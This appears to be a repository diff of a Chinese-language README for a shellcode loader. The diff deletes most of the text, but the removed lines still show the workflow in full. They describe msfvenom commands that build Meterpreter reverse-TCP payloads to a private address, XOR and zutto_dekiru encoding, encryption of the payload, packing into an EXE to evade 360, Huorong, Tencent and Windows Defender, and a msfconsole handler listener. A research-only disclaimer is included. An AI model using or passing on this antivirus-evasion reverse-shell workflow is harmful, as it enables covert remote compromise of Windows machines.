|
1 | | -# ShellCode_Loader |
2 | | -ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。 |
3 | | -# 声明 |
4 | | -该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!! |
5 | | -代码未经过大量测试,如发现问题请提交 issue。 |
6 | | -# 测试环境 |
7 | | -截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测) |
| 1 | +# 临时删除 后续发布 |
8 | 2 |
|
9 | | -Windows 7 64位 或以上操作系统应该都没问题(没有测试) |
10 | | -# 生成Msf_Payload |
11 | | -### 默认 |
12 | | -``` |
13 | | -msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload.c |
14 | | -
|
15 | | -msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f py -o payload_py.c |
16 | | -``` |
17 | | -### XOR 编码器 |
18 | | -``` |
19 | | -msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_xor.c |
20 | | -``` |
21 | | -### 动态密钥XOR编码器 |
22 | | -``` |
23 | | -msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_xor_dynamic.c |
24 | | -``` |
25 | | -### Zutto Dekiru |
26 | | -``` |
27 | | -msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_zutto_dekiru.c |
28 | | -``` |
29 | | -# 生成CobaltStrike_Payload |
30 | | - |
31 | | - |
32 | | -选择使用x64的C语言或Python语言的Shellcode。 |
33 | | - |
34 | | - |
35 | | - |
36 | | -得到一个payload.c的文件 |
37 | | - |
38 | | -内容为: |
39 | | - |
40 | | - |
41 | | - |
42 | | -# 加密Payload |
43 | | -``` |
44 | | -Shellcode_encryption.exe payload.c |
45 | | -``` |
46 | | - |
47 | | - |
48 | | -# 配置ShellCode加载器 |
49 | | -将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode' 处 |
50 | | -示例: |
51 | | - |
52 | | -最终格式: |
53 | | - |
54 | | -# 打包可执行程序(EXE编译环境) |
55 | | -Python 3.8.6 |
56 | | - |
57 | | -pyinstaller 4.7 |
58 | | -``` |
59 | | -pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple |
60 | | -pyinstaller -F -w ShellCode_Loader.py |
61 | | -``` |
62 | | -生成ShellCode_Loader.exe在dist目录中 |
63 | | -# 上线测试 |
64 | | -## 运行监听 |
65 | | -``` |
66 | | -msfconsole |
67 | | -msf6 > use exploit/multi/handler |
68 | | -msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp |
69 | | -msf6 exploit(multi/handler) > set lhost 0.0.0.0 |
70 | | -msf6 exploit(multi/handler) > set lport 8080 |
71 | | -msf6 exploit(multi/handler) > run |
72 | | -``` |
73 | | - |
74 | | - |
75 | | -帮忙点个Star 谢谢 |
76 | 3 | # 参考链接 |
77 | 4 | https://mp.weixin.qq.com/s/M3tbE08ybD_lIrJS8FtPTw |
78 | 5 |
|
|
0 commit comments